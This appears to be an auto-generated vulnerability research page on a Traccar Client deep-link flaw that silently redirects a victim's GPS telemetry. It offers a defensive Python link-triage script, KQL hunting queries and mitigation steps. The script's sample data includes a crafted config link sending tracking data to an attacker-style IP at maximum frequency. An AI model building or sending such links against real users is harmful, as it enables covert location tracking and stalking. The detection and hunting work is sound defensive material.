$ research-item --score 30 --exploit none

Traccar Client is a GPS tracking mobile app for sending location updates to p…

Research page generated from configured evidence sources. Treat this as an analyst workbench: facts are sourced, gaps are labelled, and low-confidence chatter is separated from confirmed evidence.

Executive judgement

  • Operational lane: monitor
  • Priority score: 30
  • Confidence: high
  • Exploit status: none — No public exploitation signal captured by the configured pipeline yet.
  • Urgent publishable: no
  • CISA KEV: No CISA KEV match captured in configured source data at generation time.
  • Published/observed: 2026-06-17
  • EPSS score: not available

What happened

Traccar Client is a GPS tracking mobile app for sending location updates to private servers using the open-source Traccar platform. In versions 9.7.19 and below, the app registers a custom org.traccar.client://config deep-link scheme whose handler writes attacker-supplied parameters (server URL, device ID, accuracy, distance, and interval) straight into the app's persistent configuration, with no confirmation prompt, notification, or visual indication. A single crafted link delivered via SMS, email, a web page, or any installed app therefore reconfigures the app the moment the victim taps it, and the attacker needs no special permissions on the device. The attacker can covertly redirect all of the victim's GPS telemetry to a server they control, at maximum precision and reporting frequency, and the change persists across restarts, giving continuous real-time tracking of the victim's location. This issue is fixed in version 9.7.20.
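As an added example, not code from this page or from the Traccar project: a small Python triage script that pulls org.traccar.client://config links out of message bodies (SMS exports, mail bodies, crawled pages) and rates each one against an allowlist of your own Traccar server hosts. The query parameter names (url, id, accuracy, distance, interval) are assumed from the parameter list above and were not checked against the app's source; the sample messages and the allowlist are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Scheme and host the page names for the config deep link.
DEEPLINK_SCHEME = "org.traccar.client"
DEEPLINK_HOST = "config"

# ASSUMPTION: query keys derived from the page's parameter list (server URL,
# device ID, accuracy, distance, interval). Not verified against the app's source.
SERVER_KEY = "url"
DEVICE_KEY = "id"
TUNING_KEYS = ("accuracy", "distance", "interval")

# Stop at whitespace or common delimiters so a link embedded in prose is cut cleanly.
LINK_RE = re.compile(r"org\.traccar\.client://[^\s<>\"']+", re.IGNORECASE)


def extract_links(text):
    """Return every Traccar deep link embedded in free text (SMS, mail body, web page)."""
    return LINK_RE.findall(text)


def parse_config_link(link):
    """Parse a deep link into its config parameters, or None if it is not a config link."""
    parts = urlsplit(link)
    if parts.scheme.lower() != DEEPLINK_SCHEME or parts.netloc.lower() != DEEPLINK_HOST:
        return None
    # keep_blank_values so an empty id= still counts as a supplied parameter.
    return {k: v[-1] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}


def assess_link(link, allowed_hosts):
    """Triage one link against the organisation's approved Traccar server hosts.

    Returns (verdict, findings); verdict is "benign", "suspicious" or "hijack".
    Any config link is at least suspicious, because the vulnerable versions apply
    it without confirmation; a server URL outside the allowlist is a hijack.
    """
    params = parse_config_link(link)
    if params is None:
        return "benign", []
    findings = []
    verdict = "suspicious"
    server = params.get(SERVER_KEY)
    if server:
        host = (urlsplit(server).hostname or "").lower()
        if host not in {h.lower() for h in allowed_hosts}:
            verdict = "hijack"
            findings.append(f"server redirected to unapproved host {host!r}")
    if DEVICE_KEY in params:
        findings.append(f"device id overwritten with {params[DEVICE_KEY]!r}")
    for key in TUNING_KEYS:
        if key in params:
            findings.append(f"{key} set to {params[key]!r}")
    return verdict, findings


def triage_messages(messages, allowed_hosts):
    """Run the triage over (source, body) pairs; one row per link found."""
    rows = []
    for source, body in messages:
        for link in extract_links(body):
            verdict, findings = assess_link(link, allowed_hosts)
            rows.append({"source": source, "link": link, "verdict": verdict, "findings": findings})
    return rows


# Constructed sample messages and allowlist (not real captures).
SAMPLE_MESSAGES = [
    ("sms:+15550001111",
     "Fleet IT: tap to finish setup org.traccar.client://config?url=https://gps.corp.example/&id=van-17"),
    ("mail:helpdesk@corp.example",
     "Your tracker needs an update: org.traccar.client://config?url=http://203.0.113.7:5055"
     "&id=van-17&accuracy=high&distance=0&interval=1 before Friday."),
    ("web:https://www.example.net/blog", "Read more about fleet tracking at https://traccar.org/"),
]
ALLOWED_HOSTS = {"gps.corp.example"}

if __name__ == "__main__":
    for row in triage_messages(SAMPLE_MESSAGES, ALLOWED_HOSTS):
        print(row["verdict"].upper(), row["source"], row["link"])
        for finding in row["findings"]:
            print("   -", finding)
```

A "hijack" row means the link would point the app at a server you do not own; a "suspicious" row is a config link to an approved host, which still deserves a look because an unpatched client applies it silently.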

Why it matters

  • The item was promoted because the pipeline observed: priority score 30, exploit status none, confidence high.
  • It has a CVE identifier, so it can be tracked across NVD/CVE.org/vendor/exploit sources.
  • No PoC signal was detected by the current pipeline unless shown elsewhere on this page.

Evidence collected

Exploitation and PoC status

  • Current automated assessment: No public exploitation signal captured by the configured pipeline yet.
  • Public exploit/PoC: No PoC source captured yet by the configured pipeline.
  • Exploited in the wild: Not confirmed by configured sources at generation time.
  • Ransomware association: No ransomware association captured at generation time.

Publication / validation flags

  • no_exploitation_signal

Dark web / low-confidence chatter

  • No matching OTX/URLhaus/MalwareBazaar item found in configured low-confidence feeds at generation time.
  • This is not proof of absence. It means the current automated sources did not capture relevant underground or malware-feed chatter.

Defender actions

  • Ensure all mobile devices using Traccar Client are updated to version 9.7.20 or later from the official app stores.
  • For managed devices (MDM), push a managed app configuration that sets the server URL and device ID, then confirm on a test device running the patched version that a crafted org.traccar.client://config link no longer overrides the pushed server URL; do not assume the MDM profile alone locks the setting.
  • Educate users not to click on unsolicited links claiming to be configuration links for tracking apps.

Defender / Sentinel hunting queries

MDE exposure: devices with CVE-2026-48745

Find devices where Microsoft Defender Vulnerability Management reports the CVE.

DeviceTvmSoftwareVulnerabilities
| where CveId == "CVE-2026-48745"
| project DeviceName, OSPlatform, SoftwareVendor, SoftwareName, SoftwareVersion, VulnerabilitySeverityLevel, RecommendedSecurityUpdate, LastSeenTime
| order by VulnerabilitySeverityLevel desc, LastSeenTime desc

MDO email delivery and threat hunt

Find delivered emails matching threat indicators for this campaign/vulnerability.

EmailEvents
| where Timestamp > ago(14d)
// The pipeline's keywords were "Traccar", "Client", "tracking" and "mobile".
// The last three match a large share of all mail and were dropped from the
// sender fields; "tracking" is kept only when the message also carries a verdict.
| where Subject has "Traccar"
    or SenderFromAddress has "traccar"
    or SenderMailFromAddress has "traccar"
    or (Subject has "tracking" and (ThreatTypes has "Phish" or ThreatTypes has "Malware"))
| project Timestamp, NetworkMessageId, SenderFromAddress, SenderMailFromAddress, RecipientEmailAddress, Subject, ThreatTypes, DeliveryAction, LatestDeliveryLocation
| order by Timestamp desc

Track clicks on potentially malicious URLs delivered via email for this campaign.

UrlClickEvents
| where Timestamp > ago(14d)
// Match the vendor name or the config deep-link scheme directly; bare "Client"
// and "tracking" matched far too broadly. Custom-scheme links are not normally
// rewritten by Safe Links, so hits are more likely to be https pages that lead
// to the deep link than the scheme itself.
| where Url has "traccar"
    or Url contains "org.traccar.client"
    or (Url has "tracking" and (IsClickedThrough == 1 or ThreatTypes has "Phish"))
| project Timestamp, NetworkMessageId, Url, AccountUpn, Workload, IsClickedThrough, ThreatTypes, ActionType
| order by Timestamp desc

MDE endpoint behaviour hunt

General endpoint hunt for named tooling, malware, or exploit artefacts from the research item. Tune terms with vendor IOCs.

DeviceProcessEvents
| where Timestamp > ago(14d)
// The vulnerable component is a mobile app, so hits here are more likely to be
// Traccar server components or tooling than the client itself; treat them as an
// inventory signal. Generic terms ("Client", "mobile", "sending") were dropped.
| where ProcessCommandLine has "traccar" or FileName has "traccar" or FolderPath has "traccar"
| project Timestamp, DeviceName, AccountName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc

Exposure validation ideas

  • Search MDM and asset inventory for Traccar Client installs and flag any version at or below 9.7.19, along with any CVE reference.
  • Check internet-facing exposure through approved tools only; Shodan/Censys/GreyNoise results are research starting points, not proof of exposure. For this item the vulnerable component is the mobile app, so the question is which devices run an unpatched version, not which services listen.
  • Prioritise management interfaces, edge devices, identity/control-plane systems, and OT/ICS assets where relevant.

Detection / hunting ideas

  • Review the legitimate Traccar server's logs for devices whose position reports stop unexpectedly: telemetry redirected to an attacker's server no longer reaches yours, so a silent drop-off is the most direct sign of a hijacked client.
  • Search SIEM/EDR and MDM telemetry for Traccar Client installs below 9.7.20, and for newly published indicators from primary sources.
  • Monitor for scanner traffic or nuclei/metasploit module references once public exploit tooling appears.

Open questions

  • Does a primary vendor advisory confirm the affected range (9.7.19 and below) and fixed version (9.7.20) given in the description, and which platforms it covers?
  • Has CISA KEV, Shadowserver, GreyNoise, or a trusted vendor confirmed exploitation?
  • Are there credible PoC repositories or only secondary reporting mentioning PoC?
  • Is there underground/forum/leak-site discussion, or only public reporting?

Generated: 2026-06-17T15:39:20+00:00
